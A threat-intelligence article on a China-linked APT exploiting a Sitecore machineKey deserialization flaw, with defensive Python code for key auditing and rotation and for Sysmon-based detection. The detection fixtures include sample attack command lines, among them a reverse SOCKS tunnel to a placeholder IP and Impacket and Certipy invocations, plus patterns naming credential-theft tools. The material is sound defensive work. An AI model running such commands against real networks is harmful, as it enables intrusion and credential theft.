Chinese APT Exploits Sitecore Zero-Day to Target North American Infrastructure

A cyber espionage campaign attributed to a China-linked Advanced Persistent Threat (APT) group tracked as UAT-8837 has been targeting critical infrastructure organizations across North America since at least 2025. The group gained initial access by exploiting CVE-2025-53690, a vulnerability in the Sitecore Experience Platform that was a zero-day at the time of the first observed intrusions, to break into high-value targets.

Exploitation of Sitecore Vulnerability

CVE-2025-53690 is rated critical (CVSS 9.0). It is a ViewState deserialization flaw rooted in configuration rather than in product code: Sitecore's older deployment guides shipped a sample ASP.NET machineKey, and installations of Experience Manager (XM), Experience Platform (XP), Experience Commerce (XC) and Managed Cloud that kept that key in web.config are exposed. Anyone who knows the validation key can sign an arbitrary ViewState payload, and the server will deserialize it, giving the attacker remote code execution in the IIS worker process without any credentials. Sitecore published its advisory and remediation guidance in early September 2025, after reports of in-the-wild exploitation. Because the weakness is the key itself, remediation means replacing any documentation-derived machineKey with unique, randomly generated keys; updating the product without rotating a known key leaves the deserialization path open.
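The practical check a practitioner wants here is whether a deployment still runs on a machineKey somebody else knows, and what a correct replacement looks like. The following is an added example written for this page, not code from Sitecore or from the report. It parses a constructed web.config, flags a static validationKey that appears in a (here, placeholder) inventory of shared keys plus a legacy validation algorithm, and rotates the element to fresh HMACSHA256/AES keys of the lengths IIS itself generates. The key values in the sample are invented placeholders, not the real sample keys from Sitecore's documentation.

```python
"""Audit an ASP.NET web.config for a static <machineKey> and rotate it.

Added example for this page, not code from Sitecore or from the report.
The web.config below is constructed for illustration, and the key values in
it are placeholders, not the real sample keys from Sitecore's documentation.
"""
import re
import secrets
import xml.etree.ElementTree as ET

# Constructed sample: a deployment that still carries a machineKey copied
# verbatim from a deployment guide (placeholder values, invented here).
SAMPLE_WEB_CONFIG = """<?xml version="1.0"?>
<configuration>
  <system.web>
    <machineKey validationKey="0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF"
                decryptionKey="0123456789ABCDEF0123456789ABCDEF"
                validation="SHA1" decryption="AES" />
    <pages enableViewStateMac="true" />
  </system.web>
</configuration>
"""

# Inventory of key values known to be public or shared across deployments.
# Populate from your own records; the only entry here is the placeholder above.
KNOWN_SHARED_VALIDATION_KEYS = {
    "0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF",
}

# Legacy MAC algorithms ASP.NET still accepts for validation; flag them.
LEGACY_VALIDATION = {"MD5", "SHA1", "3DES"}


def audit_machine_key(web_config_xml):
    """Return findings for <system.web><machineKey> in the given web.config."""
    root = ET.fromstring(web_config_xml)
    findings = {
        "static_key": False,           # explicit key rather than AutoGenerate
        "known_shared_key": False,     # the key is in the shared-key inventory
        "legacy_validation": False,    # MD5/SHA1/3DES MAC algorithm
        "viewstate_mac_disabled": False,
    }
    mk = root.find("./system.web/machineKey")
    if mk is not None:
        vkey = mk.get("validationKey", "AutoGenerate,IsolateApps")
        if "AutoGenerate" not in vkey:
            # A static key is legitimate (and required across a web farm);
            # the finding that matters is whether anyone else knows it.
            findings["static_key"] = True
            findings["known_shared_key"] = vkey.upper() in KNOWN_SHARED_VALIDATION_KEYS
        findings["legacy_validation"] = mk.get("validation", "").upper() in LEGACY_VALIDATION
    pages = root.find("./system.web/pages")
    if pages is not None and pages.get("enableViewStateMac", "true").lower() == "false":
        findings["viewstate_mac_disabled"] = True
    return findings


def rotate_machine_key(web_config_xml):
    """Return the config with a fresh random HMACSHA256/AES machineKey."""
    root = ET.fromstring(web_config_xml)
    system_web = root.find("./system.web")
    if system_web is None:
        system_web = ET.SubElement(root, "system.web")
    mk = system_web.find("machineKey")
    if mk is None:
        mk = ET.SubElement(system_web, "machineKey")
    mk.set("validationKey", secrets.token_hex(64).upper())  # 512-bit HMAC key
    mk.set("decryptionKey", secrets.token_hex(32).upper())  # 256-bit AES key
    mk.set("validation", "HMACSHA256")
    mk.set("decryption", "AES")
    return ET.tostring(root, encoding="unicode")


def has_well_formed_keys(web_config_xml):
    """True if the machineKey holds 128 and 64 upper-case hex chars respectively."""
    mk = ET.fromstring(web_config_xml).find("./system.web/machineKey")
    return (mk is not None
            and re.fullmatch(r"[0-9A-F]{128}", mk.get("validationKey", "")) is not None
            and re.fullmatch(r"[0-9A-F]{64}", mk.get("decryptionKey", "")) is not None)


if __name__ == "__main__":
    print("before:", audit_machine_key(SAMPLE_WEB_CONFIG))
    print("after: ", audit_machine_key(rotate_machine_key(SAMPLE_WEB_CONFIG)))
```

Two caveats when applying this for real: the new key must be identical on every node of a web farm or ViewState and forms-authentication tickets will fail across nodes, and rotation invalidates every ticket and ViewState issued under the old key, so schedule it rather than hot-swapping it on a busy site. The point of `known_shared_key` rather than `static_key` is that a static key is normal; a static key that is also printed in a public document is the vulnerability.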

Tactics and Tools Employed by UAT-8837

After gaining initial access through the Sitecore vulnerability, UAT-8837 uses a consistent set of tactics and tools to keep its foothold, harvest credentials and move deeper into the compromised network. The group's activities include:

– Disabling Security Features: The attackers disable RestrictedAdmin mode for Remote Desktop Protocol (RDP). With the mode on, an RDP logon does not send the user's credentials to the remote host; with it off, the full credentials are delegated to that host, where anyone who already controls it can harvest them from LSASS. The mode is governed by the registry value HKLM\System\CurrentControlSet\Control\Lsa\DisableRestrictedAdmin, so any change to that value is a cheap and high-value thing to alert on.

– Deploying Open-Source Tools: UAT-8837 relies largely on publicly available tooling for credential harvesting, Active Directory reconnaissance, tunnelling and lateral movement. Tools observed include:

– GoTokenTheft: used to steal Windows access tokens so the attackers can impersonate logged-on users and escalate privileges.

– EarthWorm: a lightweight tunnelling utility that opens a reverse SOCKS proxy to attacker-controlled infrastructure, giving the group a covert channel into internal network segments.

– DWAgent: the agent component of the DWService remote-administration product, installed for persistent remote access and used as a foothold from which the group ran Active Directory reconnaissance.

– SharpHound: the BloodHound data collector, used to gather Active Directory objects, sessions, group memberships and ACLs and to map paths to privileged accounts.

– Impacket: a Python library implementing Windows network protocols (SMB, MS-RPC, Kerberos and others); its bundled example scripts let the group execute commands on remote hosts using stolen elevated credentials.

– GoExec: a Go-based remote command-execution tool used to run commands on other endpoints in the victim network for lateral movement.

– Rubeus: a C# toolkit for Kerberos interaction and abuse, used for ticket requests, ticket extraction and related credential theft.

– Certipy: a tool for enumerating and abusing Active Directory Certificate Services (AD CS), including misconfigured certificate templates that allow privilege escalation.
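The RestrictedAdmin change and most of the tooling above leave telemetry that endpoint logging already captures. The following is an added example for this page, not detection content from the report: it runs over constructed events in the shape of Sysmon output (Event ID 13 RegistryValueSet and Event ID 1 ProcessCreate), alerts on any write to the DisableRestrictedAdmin value in either direction, and applies command-line heuristics derived from the documented syntax of SharpHound, Rubeus, Certipy, Impacket and EarthWorm. The patterns, hosts, paths and addresses are assumptions made for the example, not indicators published with the report.

```python
"""Flag RestrictedAdmin tampering and known-tool command lines in Sysmon events.

Added example for this page, not detection content from the report. The
events below are constructed in the shape of Sysmon output (EventID 13
RegistryValueSet, EventID 1 ProcessCreate); the command-line patterns are
heuristics derived from each tool's documented syntax, not indicators
published with the report.
"""
import re

# Registry value that controls RestrictedAdmin mode for RDP:
# 0 = mode enabled (credentials are not sent to the RDP host, but
#     pass-the-hash logons over RDP become possible),
# 1 = mode disabled (full credentials are delegated to the RDP host).
RESTRICTED_ADMIN_VALUE = (
    r"HKLM\System\CurrentControlSet\Control\Lsa\DisableRestrictedAdmin"
)

# Heuristics keyed on each tool's documented command-line usage. Renamed
# binaries dodge the name checks, so flags and sub-commands matter more.
TOOL_PATTERNS = {
    "SharpHound": re.compile(r"sharphound|-c\s+all\b|--collectionmethods?\b", re.I),
    "Rubeus": re.compile(r"rubeus|\b(asktgt|kerberoast|tgtdeleg|s4u)\b", re.I),
    "Certipy": re.compile(r"\bcertipy(\.py)?\s+(find|req|auth|shadow)\b", re.I),
    "Impacket": re.compile(r"\b(wmiexec|psexec|smbexec|atexec|secretsdump)(\.py)?\b", re.I),
    "EarthWorm": re.compile(r"\bew(\.exe)?\s+-s\s+(rssocks|rcsocks|ssocksd|lcx_\w+)\b", re.I),
}

# Constructed events (not real telemetry); 203.0.113.0/24 is a documentation range.
SAMPLE_EVENTS = [
    {"EventID": 13, "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Control\Lsa\DisableRestrictedAdmin",
     "Details": "DWORD (0x00000001)"},
    {"EventID": 13, "Image": r"C:\Windows\System32\svchost.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Domain",
     "Details": "corp.example"},
    {"EventID": 1, "Image": r"C:\Windows\Temp\sh.exe",
     "CommandLine": r"C:\Windows\Temp\sh.exe -c All --zipfilename out.zip"},
    {"EventID": 1, "Image": r"C:\Users\Public\ew.exe",
     "CommandLine": r"C:\Users\Public\ew.exe -s rssocks -d 203.0.113.5 -e 8888"},
    {"EventID": 1, "Image": r"C:\Python311\python.exe",
     "CommandLine": r"python.exe wmiexec.py corp/admin@10.0.0.5 whoami"},
    {"EventID": 1, "Image": r"C:\Python311\python.exe",
     "CommandLine": "certipy find -u user@corp.example -p Passw0rd -dc-ip 10.0.0.1 -vulnerable"},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c dir C:\\Users"},
]


def parse_dword(details):
    """Sysmon renders DWORD values as 'DWORD (0x00000001)'; return the int."""
    m = re.fullmatch(r"DWORD \((0x[0-9A-Fa-f]+)\)", details.strip())
    return int(m.group(1), 16) if m else None


def detect(events):
    """Return one alert dict per matching event, in event order."""
    alerts = []
    for ev in events:
        if (ev.get("EventID") == 13
                and ev.get("TargetObject", "").lower() == RESTRICTED_ADMIN_VALUE.lower()):
            value = parse_dword(ev.get("Details", ""))
            # Either direction is a posture change an intruder has a use for
            # (see the comment on the value above), so alert on both.
            if value is None:
                state = "unknown"
            else:
                state = "disabled" if value else "enabled"
            alerts.append({"rule": "RestrictedAdminTamper", "state": state,
                           "image": ev.get("Image")})
        elif ev.get("EventID") == 1:
            cmd = ev.get("CommandLine", "")
            for tool, pattern in TOOL_PATTERNS.items():
                if pattern.search(cmd):
                    alerts.append({"rule": "ToolCommandLine", "tool": tool,
                                   "image": ev.get("Image")})
                    break
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Note that the renamed SharpHound binary (sh.exe) is caught on its `-c All` flag rather than its name, which is why the patterns lean on sub-commands. The registry rule deliberately fires on a write of 0 as well as 1: enabling RestrictedAdmin mode is what makes pass-the-hash over RDP possible, so a silent change either way deserves a look. Treat every pattern here as a triage heuristic to be tuned against your own baseline, not a signature.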

Reconnaissance and Data Exfiltration

After establishing a foothold, UAT-8837 conducts extensive reconnaissance to map the network and identify valuable assets. The group has been observed exfiltrating credentials, security configurations, and domain and Active Directory data. In one intrusion it also exfiltrated DLLs (shared libraries) belonging to the victim's own products. That matters beyond the immediate data loss: an actor holding a vendor's release libraries could trojanize them and try to push a backdoored build to the vendor's customers, so the theft should be treated as a potential supply chain event, with the affected artifacts re-verified against build records and code-signing material before any further release.

Implications and Recommendations

The activities of UAT-8837 underscore the persistent threat that state-sponsored actors pose to critical infrastructure. The exploitation of a configuration-level zero-day such as CVE-2025-53690 shows that timely patching is necessary but not sufficient: a known secret has to be rotated, not merely updated around. Organizations are advised to:

– Apply Patches Promptly: Keep all systems, especially internet-facing ones, on current security updates. For CVE-2025-53690 specifically, follow Sitecore's guidance and replace any machineKey copied from documentation with unique, randomly generated keys, then check other ASP.NET applications for the same mistake.

– Monitor Network Activity: Implement continuous monitoring for the behaviours described above, such as changes to the RestrictedAdmin registry setting, outbound SOCKS or tunnelling connections originating from web servers, and Active Directory collection activity (SharpHound, Certipy, Rubeus) from hosts that have no business performing it.

– Restrict Remote Access: Limit RDP and other remote-access protocols to jump hosts and privileged-access workstations, require multi-factor authentication, and keep RestrictedAdmin mode and other credential-delegation settings under configuration management so that silent changes are detected and reverted.

– Conduct Regular Security Audits: Perform periodic assessments to identify and remediate vulnerabilities within the network, including reviews of application configuration files for secrets that were copied from public sources.

By adopting these measures, organizations can improve their resilience against intrusions of this kind and protect their critical assets from exploitation.